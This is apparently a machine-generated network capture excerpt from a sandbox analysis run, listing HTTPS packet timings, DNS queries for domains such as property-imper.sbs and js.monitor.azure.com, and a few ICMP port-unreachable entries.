                                                                                                                                                                                                Nov 23, 2024 16:55:03.909919024 CET4434999113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:04.283489943 CET4434998913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:04.290622950 CET4434998813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:04.307655096 CET49989443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:04.307672977 CET4434998913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:04.308089972 CET49989443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:04.308094978 CET4434998913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:04.308330059 CET49988443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:04.308406115 CET4434998813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:04.308631897 CET49988443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:04.308645964 CET4434998813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:04.354180098 CET4434999013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:04.369458914 CET49990443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:04.369492054 CET4434999013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:04.369925976 CET49990443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:04.369936943 CET4434999013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:04.526359081 CET4434998713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:04.529264927 CET4434998713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:04.529345989 CET49987443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:04.533061981 CET49987443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:04.533061981 CET49987443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:04.533097982 CET4434998713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:04.533112049 CET4434998713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:04.546227932 CET49992443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:04.546336889 CET4434999213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:04.546436071 CET49992443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:04.546581030 CET49992443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:04.546602011 CET4434999213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:04.765520096 CET4434998913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:04.768789053 CET4434998913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:04.769694090 CET49989443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:04.769741058 CET49989443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:04.769756079 CET4434998913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:04.769766092 CET49989443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:04.769772053 CET4434998913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:04.772789001 CET49993443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:04.772830963 CET4434999313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:04.772900105 CET49993443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:04.773061037 CET49993443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:04.773078918 CET4434999313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:04.776180029 CET4434998813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:04.779433012 CET4434998813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:04.779475927 CET4434998813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:04.779546022 CET49988443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:04.779597044 CET49988443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:04.779633045 CET4434998813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:04.779659986 CET49988443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:04.779675007 CET4434998813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:04.781567097 CET49994443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:04.781609058 CET4434999413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:04.785701990 CET49994443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:04.785819054 CET49994443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:04.785845995 CET4434999413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:04.807945967 CET4434999013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:04.810940027 CET4434999013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:04.811078072 CET4434999013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:04.811150074 CET49990443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:04.811186075 CET49990443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:04.811197996 CET4434999013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:04.811225891 CET49990443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:04.811235905 CET4434999013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:04.813046932 CET49995443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:04.813066006 CET4434999513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:04.813148022 CET49995443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:04.813260078 CET49995443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:04.813271999 CET4434999513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:05.862013102 CET4434999113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:05.865262032 CET49991443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:05.865273952 CET4434999113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:05.865675926 CET49991443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:05.865679979 CET4434999113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:06.318248034 CET4434999113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:06.323682070 CET4434999113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:06.323853016 CET49991443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:06.323853016 CET49991443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:06.323853016 CET49991443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:06.325889111 CET49996443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:06.325933933 CET4434999613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:06.326019049 CET49996443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:06.326138973 CET49996443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:06.326148033 CET4434999613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:06.382448912 CET4434999213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:06.383378983 CET49992443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:06.383450985 CET4434999213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:06.384187937 CET49992443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:06.384202003 CET4434999213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:06.564980984 CET4434999313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:06.565931082 CET49993443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:06.565969944 CET4434999313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:06.566440105 CET49993443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:06.566447973 CET4434999313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:06.571458101 CET4434999513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:06.571794033 CET49995443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:06.571811914 CET4434999513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:06.572164059 CET49995443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:06.572170019 CET4434999513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:06.614865065 CET4434999413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:06.615461111 CET49994443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:06.615502119 CET4434999413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:06.615761042 CET49994443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:06.615772009 CET4434999413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:06.630328894 CET49991443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:06.630352020 CET4434999113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:06.827646017 CET4434999213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:06.830864906 CET4434999213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:06.830940008 CET49992443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:06.831022024 CET49992443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:06.831022024 CET49992443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:06.831068993 CET4434999213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:06.831098080 CET4434999213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:06.833595037 CET49997443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:06.833642006 CET4434999713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:06.833725929 CET49997443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:06.833844900 CET49997443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:06.833863974 CET4434999713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:07.001477003 CET4434999313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:07.004558086 CET4434999313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:07.004621983 CET49993443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:07.004673958 CET49993443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:07.004673958 CET49993443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:07.004698992 CET4434999313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:07.004714012 CET4434999313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:07.005919933 CET4434999513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:07.007009983 CET49998443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:07.007049084 CET4434999813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:07.007129908 CET49998443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:07.007237911 CET49998443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:07.007256985 CET4434999813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:07.008946896 CET4434999513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:07.009011984 CET49995443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:07.009033918 CET49995443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:07.009041071 CET4434999513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:07.009053946 CET49995443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:07.009057999 CET4434999513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:07.011113882 CET49999443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:07.011136055 CET4434999913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:07.011198997 CET49999443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:07.011374950 CET49999443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:07.011389017 CET4434999913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:07.063534021 CET4434999413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:07.066714048 CET4434999413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:07.066834927 CET49994443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:07.067137003 CET49994443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:07.067137003 CET49994443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:07.067176104 CET4434999413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:07.067199945 CET4434999413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:07.069322109 CET50000443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:07.069363117 CET4435000013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:07.069420099 CET50000443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:07.069538116 CET50000443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:07.069545031 CET4435000013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:08.080096960 CET4434999613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:08.080876112 CET49996443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:08.080921888 CET4434999613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:08.081465960 CET49996443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:08.081471920 CET4434999613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:08.628408909 CET4434999713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:08.628881931 CET49997443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:08.628921986 CET4434999713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:08.629328012 CET49997443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:08.629334927 CET4434999713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:08.748902082 CET4434999613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:08.752012968 CET4434999613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:08.752077103 CET49996443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:08.752208948 CET49996443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:08.752230883 CET4434999613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:08.752249002 CET49996443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:08.752254009 CET4434999613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:08.754878998 CET50002443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:08.754916906 CET4435000213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:08.755187988 CET50002443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:08.755325079 CET50002443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:08.755333900 CET4435000213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:08.776175976 CET4434999813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:08.776581049 CET49998443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:08.776591063 CET4434999813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:08.777031898 CET49998443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:08.777036905 CET4434999813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:08.943098068 CET4435000013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:08.943682909 CET50000443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:08.943717957 CET4435000013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:08.944128990 CET50000443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:08.944135904 CET4435000013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:08.965436935 CET4434999913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:08.965764046 CET49999443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:08.965784073 CET4434999913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:08.966145992 CET49999443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:08.966151953 CET4434999913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:09.070683002 CET4434999713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:09.070874929 CET4434999713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:09.070983887 CET49997443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:09.071058989 CET49997443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:09.071079016 CET4434999713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:09.071089983 CET49997443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:09.071096897 CET4434999713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:09.073982000 CET50003443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:09.074095011 CET4435000313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:09.074193954 CET50003443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:09.074322939 CET50003443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:09.074347019 CET4435000313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:09.324148893 CET4434999813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:09.327433109 CET4434999813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:09.327487946 CET4434999813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:09.327486992 CET49998443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:09.327537060 CET49998443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:09.327588081 CET49998443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:09.327605009 CET4434999813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:09.327615976 CET49998443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:09.327620983 CET4434999813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:09.330044031 CET50004443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:09.330091000 CET4435000413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:09.330205917 CET50004443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:09.330358982 CET50004443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:09.330374002 CET4435000413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:09.384510994 CET4435000013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:09.384598017 CET4435000013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:09.384669065 CET50000443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:09.384828091 CET50000443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:09.384841919 CET4435000013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:09.388339996 CET50005443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:09.388374090 CET4435000513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:09.388441086 CET50005443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:09.388751030 CET50005443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:09.388765097 CET4435000513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:09.416121006 CET4434999913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:09.419711113 CET4434999913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:09.419775963 CET49999443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:09.419821978 CET49999443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:09.419843912 CET4434999913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:09.419856071 CET49999443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:09.419862032 CET4434999913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:09.422244072 CET50006443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:09.422267914 CET4435000613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:09.422450066 CET50006443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:09.422555923 CET50006443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:09.422569990 CET4435000613.107.246.63192.168.2.4
                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                Nov 23, 2024 16:53:02.911489964 CET6243853192.168.2.41.1.1.1
                                                                                                                                                                                                Nov 23, 2024 16:53:03.396074057 CET53624381.1.1.1192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:20.137286901 CET138138192.168.2.4192.168.2.255
                                                                                                                                                                                                Nov 23, 2024 16:53:39.187678099 CET53629851.1.1.1192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:39.227169037 CET53522221.1.1.1192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:42.025532961 CET53522731.1.1.1192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:42.694571972 CET5810853192.168.2.41.1.1.1
                                                                                                                                                                                                Nov 23, 2024 16:53:42.694865942 CET5467853192.168.2.41.1.1.1
                                                                                                                                                                                                Nov 23, 2024 16:53:42.840217113 CET53581081.1.1.1192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:42.840332031 CET53546781.1.1.1192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:45.636598110 CET5399453192.168.2.41.1.1.1
                                                                                                                                                                                                Nov 23, 2024 16:53:45.636739016 CET5850853192.168.2.41.1.1.1
                                                                                                                                                                                                Nov 23, 2024 16:53:48.936352968 CET6182153192.168.2.41.1.1.1
                                                                                                                                                                                                Nov 23, 2024 16:53:48.936708927 CET6244753192.168.2.41.1.1.1
                                                                                                                                                                                                Nov 23, 2024 16:53:53.710262060 CET53575841.1.1.1192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:54.836617947 CET5203553192.168.2.41.1.1.1
                                                                                                                                                                                                Nov 23, 2024 16:53:54.837111950 CET6185253192.168.2.41.1.1.1
                                                                                                                                                                                                Nov 23, 2024 16:53:59.262974024 CET53641441.1.1.1192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:17.987871885 CET53516331.1.1.1192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:38.070717096 CET53553921.1.1.1192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:40.597949982 CET53596871.1.1.1192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:07.866468906 CET53565951.1.1.1192.168.2.4
                                                                                                                                                                                                TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                Nov 23, 2024 16:53:41.208638906 CET192.168.2.41.1.1.1c2e3(Port unreachable)Destination Unreachable
                                                                                                                                                                                                Nov 23, 2024 16:53:52.951114893 CET192.168.2.41.1.1.1c29d(Port unreachable)Destination Unreachable
                                                                                                                                                                                                Nov 23, 2024 16:53:55.236346960 CET192.168.2.41.1.1.1c275(Port unreachable)Destination Unreachable
                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                Nov 23, 2024 16:53:02.911489964 CET192.168.2.41.1.1.10x670cStandard query (0)property-imper.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:53:42.694571972 CET192.168.2.41.1.1.10x23dcStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:53:42.694865942 CET192.168.2.41.1.1.10xb35Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:53:45.636598110 CET192.168.2.41.1.1.10x8249Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:53:45.636739016 CET192.168.2.41.1.1.10xaca0Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:53:48.936352968 CET192.168.2.41.1.1.10x3423Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:53:48.936708927 CET192.168.2.41.1.1.10x61c4Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:53:54.836617947 CET192.168.2.41.1.1.10x17ceStandard query (0)mdec.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:53:54.837111950 CET192.168.2.41.1.1.10xe52eStandard query (0)mdec.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                Nov 23, 2024 16:53:03.396074057 CET1.1.1.1192.168.2.40x670cNo error (0)property-imper.sbs172.67.162.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:53:03.396074057 CET1.1.1.1192.168.2.40x670cNo error (0)property-imper.sbs104.21.33.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:53:42.840217113 CET1.1.1.1192.168.2.40x23dcNo error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:53:42.840332031 CET1.1.1.1192.168.2.40xb35No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:53:45.777770042 CET1.1.1.1192.168.2.40x8249No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:53:45.777770042 CET1.1.1.1192.168.2.40x8249No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
